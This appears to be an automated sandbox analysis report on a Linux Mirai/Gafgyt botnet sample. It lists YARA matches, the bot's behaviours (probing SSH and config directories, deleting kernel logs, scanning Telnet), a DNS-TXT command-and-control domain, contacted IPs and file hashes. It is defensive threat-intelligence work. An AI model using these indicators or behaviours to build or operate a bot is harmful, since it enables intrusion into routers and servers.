      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: classification engineClassification label: mal92.troj.evad.linELF@0/1@28/0

      Data Obfuscation

      barindex
      Source: /tmp/i686.elf (PID: 6254)File: /etc/configJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /root/.cacheJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /root/.sshJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /root/.configJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /root/.localJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /tmp/.X11-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /tmp/.Test-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /tmp/.font-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /tmp/.ICE-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /tmp/.XIM-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /etc/.javaJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/230/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/110/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/231/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/111/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/232/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/112/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/233/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/113/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/234/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/114/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/235/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/115/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/236/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/116/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/237/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/117/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/118/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/910/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/119/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/912/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/10/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/11/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/918/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/12/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/13/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/14/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/15/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/16/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/17/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/18/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/120/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/121/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/1/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/122/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/243/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/123/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/2/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/124/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/3/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/4/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/125/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/126/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/127/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/6/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/248/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/128/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/249/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/800/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/9/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/801/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/20/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/21/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/22/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/23/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/24/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/25/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/26/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/27/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/28/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/29/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/491/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/250/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/130/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/251/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/252/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/132/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/253/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/254/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/255/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/256/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/257/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/379/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/258/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/259/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/936/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/30/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/35/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/260/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/261/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/141/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/262/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/263/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/264/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/144/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/265/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/266/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/267/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/269/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/270/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/272/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/274/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/278/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/157/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/281/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/286/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/720/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/721/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/847/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/77/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/78/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/79/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/80/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/81/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/82/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/83/fdJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: /tmp/i686.elf (PID: 6254)Log files deleted: /var/log/kern.logJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: i686.elf, type: SAMPLE
      Source: Yara matchFile source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: i686.elf, type: SAMPLE
      Source: Yara matchFile source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      Path Interception1
      Hidden Files and Directories
      1
      OS Credential Dumping
      System Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Indicator Removal
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
      Application Layer Protocol
      Traffic DuplicationData Destruction
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584245 Sample: i686.elf Startdate: 04/01/2025 Architecture: LINUX Score: 92 18 ai.stackoverflow.libre 2->18 20 156.244.6.20, 19823, 37076, 45123 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 2->20 22 9 other IPs or domains 2->22 24 Suricata IDS alerts for network traffic 2->24 26 Malicious sample detected (through community Yara rule) 2->26 28 Multi AV Scanner detection for submitted file 2->28 32 3 other signatures 2->32 7 i686.elf 2->7         started        signatures3 30 Performs DNS TXT record lookups 18->30 process4 process5 9 i686.elf 7->9         started        12 i686.elf 7->12         started        14 i686.elf 7->14         started        16 2 other processes 7->16 signatures6 34 Sample tries to access files in /etc/config/ (typical for OpenWRT routers) 9->34 36 Deletes system log files 9->36
      SourceDetectionScannerLabelLink
      i686.elf26%ReversingLabsLinux.Trojan.Mirai
      i686.elf100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches

      Download Network PCAP: filteredfull

      NameIPActiveMaliciousAntivirus DetectionReputation
      ai.stackoverflow.libre
      unknown
      unknowntrue
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http:///wget.shi686.elffalse
          high
          http:///curl.shi686.elffalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            106.19.70.44
            unknownChina
            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
            38.60.221.89
            unknownUnited States
            174COGENT-174UStrue
            53.205.207.166
            unknownGermany
            31399DAIMLER-ASITIGNGlobalNetworkDEfalse
            109.202.202.202
            unknownSwitzerland
            13030INIT7CHfalse
            156.244.6.20
            unknownSeychelles
            132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
            188.166.182.194
            unknownNetherlands
            14061DIGITALOCEAN-ASNUStrue
            131.24.86.106
            unknownUnited States
            385AFCONC-BLOCK1-ASUSfalse
            74.125.250.129
            unknownUnited States
            15169GOOGLEUSfalse
            91.189.91.43
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            188.166.182.194i686.elfGet hashmaliciousMiraiBrowse
              109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
              • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
              91.189.91.43la.bot.mips.elfGet hashmaliciousMiraiBrowse
                la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                  la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                    Space.arm.elfGet hashmaliciousMiraiBrowse
                      sshd.elfGet hashmaliciousUnknownBrowse
                        Linux4.7.elfGet hashmaliciousUnknownBrowse
                          Space.arm5.elfGet hashmaliciousUnknownBrowse
                            Space.ppc.elfGet hashmaliciousMiraiBrowse
                              fenty.arm4.elfGet hashmaliciousMiraiBrowse
                                main_sh4.elfGet hashmaliciousMiraiBrowse
                                  91.189.91.42la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                    la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                      la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                        Space.arm.elfGet hashmaliciousMiraiBrowse
                                          sshd.elfGet hashmaliciousUnknownBrowse
                                            Linux4.7.elfGet hashmaliciousUnknownBrowse
                                              Space.arm5.elfGet hashmaliciousUnknownBrowse
                                                Space.ppc.elfGet hashmaliciousMiraiBrowse
                                                  fenty.arm4.elfGet hashmaliciousMiraiBrowse
                                                    main_sh4.elfGet hashmaliciousMiraiBrowse
                                                      No context
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      COGENT-174US6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 154.29.71.9
                                                      fuckunix.sh4.elfGet hashmaliciousMiraiBrowse
                                                      • 38.95.31.31
                                                      fuckunix.x86.elfGet hashmaliciousMiraiBrowse
                                                      • 38.3.112.85
                                                      Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                      • 38.162.253.66
                                                      Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                                      • 23.154.10.226
                                                      Fantazy.mips.elfGet hashmaliciousUnknownBrowse
                                                      • 38.114.1.137
                                                      Fantazy.mpsl.elfGet hashmaliciousUnknownBrowse
                                                      • 66.28.124.96
                                                      Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                      • 38.168.213.17
                                                      armv6l.elfGet hashmaliciousMiraiBrowse
                                                      • 38.148.27.213
                                                      m68k.elfGet hashmaliciousUnknownBrowse
                                                      • 50.7.22.221
                                                      DAIMLER-ASITIGNGlobalNetworkDE2.elfGet hashmaliciousUnknownBrowse
                                                      • 53.1.88.197
                                                      fuckunix.arm.elfGet hashmaliciousMiraiBrowse
                                                      • 53.25.154.76
                                                      fuckunix.x86.elfGet hashmaliciousMiraiBrowse
                                                      • 53.237.138.140
                                                      Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                      • 53.152.84.23
                                                      Fantazy.mpsl.elfGet hashmaliciousUnknownBrowse
                                                      • 53.210.65.85
                                                      Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                      • 53.60.37.184
                                                      Fantazy.arm4.elfGet hashmaliciousUnknownBrowse
                                                      • 53.119.231.134
                                                      4.elfGet hashmaliciousUnknownBrowse
                                                      • 141.113.207.50
                                                      4.elfGet hashmaliciousUnknownBrowse
                                                      • 53.155.171.82
                                                      1.elfGet hashmaliciousUnknownBrowse
                                                      • 53.66.109.18
                                                      INIT7CHla.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                      • 109.202.202.202
                                                      la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                      • 109.202.202.202
                                                      la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                      • 109.202.202.202
                                                      Space.arm.elfGet hashmaliciousMiraiBrowse
                                                      • 109.202.202.202
                                                      sshd.elfGet hashmaliciousUnknownBrowse
                                                      • 109.202.202.202
                                                      Linux4.7.elfGet hashmaliciousUnknownBrowse
                                                      • 109.202.202.202
                                                      Space.arm5.elfGet hashmaliciousUnknownBrowse
                                                      • 109.202.202.202
                                                      Space.ppc.elfGet hashmaliciousMiraiBrowse
                                                      • 109.202.202.202
                                                      fenty.arm4.elfGet hashmaliciousMiraiBrowse
                                                      • 109.202.202.202
                                                      main_sh4.elfGet hashmaliciousMiraiBrowse
                                                      • 109.202.202.202
                                                      CHINANET-BACKBONENo31Jin-rongStreetCN2.elfGet hashmaliciousUnknownBrowse
                                                      • 14.118.90.68
                                                      1.elfGet hashmaliciousUnknownBrowse
                                                      • 106.61.91.94
                                                      4.elfGet hashmaliciousUnknownBrowse
                                                      • 58.63.30.147
                                                      1.elfGet hashmaliciousUnknownBrowse
                                                      • 116.24.231.203
                                                      fuckunix.spc.elfGet hashmaliciousMiraiBrowse
                                                      • 183.19.50.85
                                                      fuckunix.sh4.elfGet hashmaliciousMiraiBrowse
                                                      • 114.98.212.180
                                                      fuckunix.mpsl.elfGet hashmaliciousMiraiBrowse
                                                      • 183.64.168.57
                                                      fuckunix.arm.elfGet hashmaliciousMiraiBrowse
                                                      • 116.5.73.89
                                                      fuckunix.mips.elfGet hashmaliciousMiraiBrowse
                                                      • 117.95.64.143
                                                      fuckunix.x86.elfGet hashmaliciousMiraiBrowse
                                                      • 121.62.216.23
                                                      No context
                                                      No context
                                                      Process:/tmp/i686.elf
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):146
                                                      Entropy (8bit):4.024394204278479
                                                      Encrypted:false
                                                      SSDEEP:3:TBGTD+FN5CSNE4F58SASI7AWHF5x5mAR/VB6GEDwcL7uoL/:TBGD+5F+RLl0AR/VgGEDLHB/
                                                      MD5:E77B19565FA2C8C6B780A198F3889313
                                                      SHA1:4B18D7D88944804C96620323D60EE89E4B985BB4
                                                      SHA-256:F71785724FCE340C9FF9CD4341B920A602A47C0B496C57CCA177B94CB4BA297D
                                                      SHA-512:D22AAC8ADD55BCD9672465F3E67AF9DD4B69C0C85903C16A1C19ABDEA59EA0674DF69FF7D7F646FE642417103C7D4B6B5B3B1D5A8017C321417CBC5B3C243732
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:The gods watch from the heavens? Let them see what a mortal can become. let them witness a man who defies their will and carves his own destiny...
                                                      File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                      Entropy (8bit):6.273347609395402
                                                      TrID:
                                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                      File name:i686.elf
                                                      File size:91'792 bytes
                                                      MD5:20f4bca1aa1a3bcdf7d2b60cea290831
                                                      SHA1:379f98b65a29576975c8c55b91badc0d940e630b
                                                      SHA256:95b557c53a7d8165212c78caf9c2cfc8dfb56b796dbdcade66655b41b5f766e1
                                                      SHA512:4e962cfbf785d81a2273744c1cb390a19592846db6ab834f3c53179b044eec5d0367e780f3873e4377c9641731027aefb770fb2bfc1204147de0b039eea221ef
                                                      SSDEEP:1536:1AgJggzdmYmvPmoHuu00iidGErSUCCkClTRMWxBseLIF26Oc/HMDkBK:SgJgkmYmvPmlMiid3UClmWf7IF26/sn
                                                      TLSH:2293295775C0CDFDC48AC9394A5B913AE632F16D2221734B2794BB312E8EE213F1E529
                                                      File Content Preview:.ELF..............>.......@.....@........d..........@.8...@.......................@.......@.....0]......0]......................8]......8]Q.....8]Q..............q..............Q.td....................................................H...._........H........

                                                      ELF header

                                                      Class:ELF64
                                                      Data:2's complement, little endian
                                                      Version:1 (current)
                                                      Machine:Advanced Micro Devices X86-64
                                                      Version Number:0x1
                                                      Type:EXEC (Executable file)
                                                      OS/ABI:UNIX - System V
                                                      ABI Version:0
                                                      Entry Point Address:0x400194
                                                      Flags:0x0
                                                      ELF Header Size:64
                                                      Program Header Offset:64
                                                      Program Header Size:56
                                                      Number of Program Headers:3
                                                      Section Header Offset:91152
                                                      Section Header Size:64
                                                      Number of Section Headers:10
                                                      Header String Table Index:9
                                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                      NULL0x00x00x00x00x0000
                                                      .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                      .textPROGBITS0x4001000x1000x117060x00x6AX0016
                                                      .finiPROGBITS0x4118060x118060xe0x00x6AX001
                                                      .rodataPROGBITS0x4118200x118200x45100x00x2A0032
                                                      .ctorsPROGBITS0x515d380x15d380x100x00x3WA008
                                                      .dtorsPROGBITS0x515d480x15d480x100x00x3WA008
                                                      .dataPROGBITS0x515d600x15d600x6700x00x3WA0032
                                                      .bssNOBITS0x5163e00x163d00x6ae80x00x3WA0032
                                                      .shstrtabSTRTAB0x00x163d00x3e0x00x0001
                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                      LOAD0x00x4000000x4000000x15d300x15d306.34080x5R E0x100000.init .text .fini .rodata
                                                      LOAD0x15d380x515d380x515d380x6980x71902.56110x6RW 0x100000.ctors .dtors .data .bss
                                                      GNU_STACK0x00x00x00x00x00.00000x6RW 0x8

                                                      Download Network PCAP: filteredfull

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2025-01-05T00:00:00.819729+01002013514ET MALWARE Potential DNS Command and Control via TXT queries1192.168.2.2343689195.10.195.19553UDP
                                                      • Total Packets: 149
                                                      • 5 Ports have been hidden.
                                                      • 23 (Telnet)
                                                      • 53 (DNS)
                                                      • 80 (HTTP)
                                                      • 443 (HTTPS)
                                                      • 5429 undefined
                                                      • 5837 undefined
                                                      • 10321 undefined
                                                      • 18234 undefined
                                                      • 19302 undefined
                                                      • 19823 undefined
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 4, 2025 23:57:54.029156923 CET43928443192.168.2.2391.189.91.42
                                                      Jan 4, 2025 23:57:54.914710999 CET5781623192.168.2.23131.24.86.106
                                                      Jan 4, 2025 23:57:54.919631004 CET2357816131.24.86.106192.168.2.23
                                                      Jan 4, 2025 23:57:54.919680119 CET5781623192.168.2.23131.24.86.106
                                                      Jan 4, 2025 23:57:54.922081947 CET6073223192.168.2.2353.205.207.166
                                                      Jan 4, 2025 23:57:54.926934004 CET236073253.205.207.166192.168.2.23
                                                      Jan 4, 2025 23:57:54.927685022 CET6073223192.168.2.2353.205.207.166
                                                      Jan 4, 2025 23:57:54.951200962 CET5804823192.168.2.23106.19.70.44
                                                      Jan 4, 2025 23:57:54.956000090 CET2358048106.19.70.44192.168.2.23
                                                      Jan 4, 2025 23:57:54.956072092 CET5804823192.168.2.23106.19.70.44
                                                      Jan 4, 2025 23:57:54.961517096 CET5781623192.168.2.23131.24.86.106
                                                      Jan 4, 2025 23:57:54.961520910 CET5804823192.168.2.23106.19.70.44
                                                      Jan 4, 2025 23:57:54.961530924 CET6073223192.168.2.2353.205.207.166
                                                      Jan 4, 2025 23:57:54.966439009 CET2357816131.24.86.106192.168.2.23
                                                      Jan 4, 2025 23:57:54.966497898 CET2358048106.19.70.44192.168.2.23
                                                      Jan 4, 2025 23:57:54.966511965 CET236073253.205.207.166192.168.2.23
                                                      Jan 4, 2025 23:57:54.966547966 CET5804823192.168.2.23106.19.70.44
                                                      Jan 4, 2025 23:57:54.966571093 CET5781623192.168.2.23131.24.86.106
                                                      Jan 4, 2025 23:57:54.966589928 CET6073223192.168.2.2353.205.207.166
                                                      Jan 4, 2025 23:57:54.993776083 CET4622810321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:57:54.998605013 CET103214622838.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:57:54.998688936 CET4622810321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:57:55.995052099 CET103214622838.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:57:55.995126009 CET4622810321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:57:56.001035929 CET4622810321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:57:56.006413937 CET103214622838.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:57:56.006470919 CET4622810321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:57:59.660355091 CET42836443192.168.2.2391.189.91.43
                                                      Jan 4, 2025 23:58:01.196140051 CET4251680192.168.2.23109.202.202.202
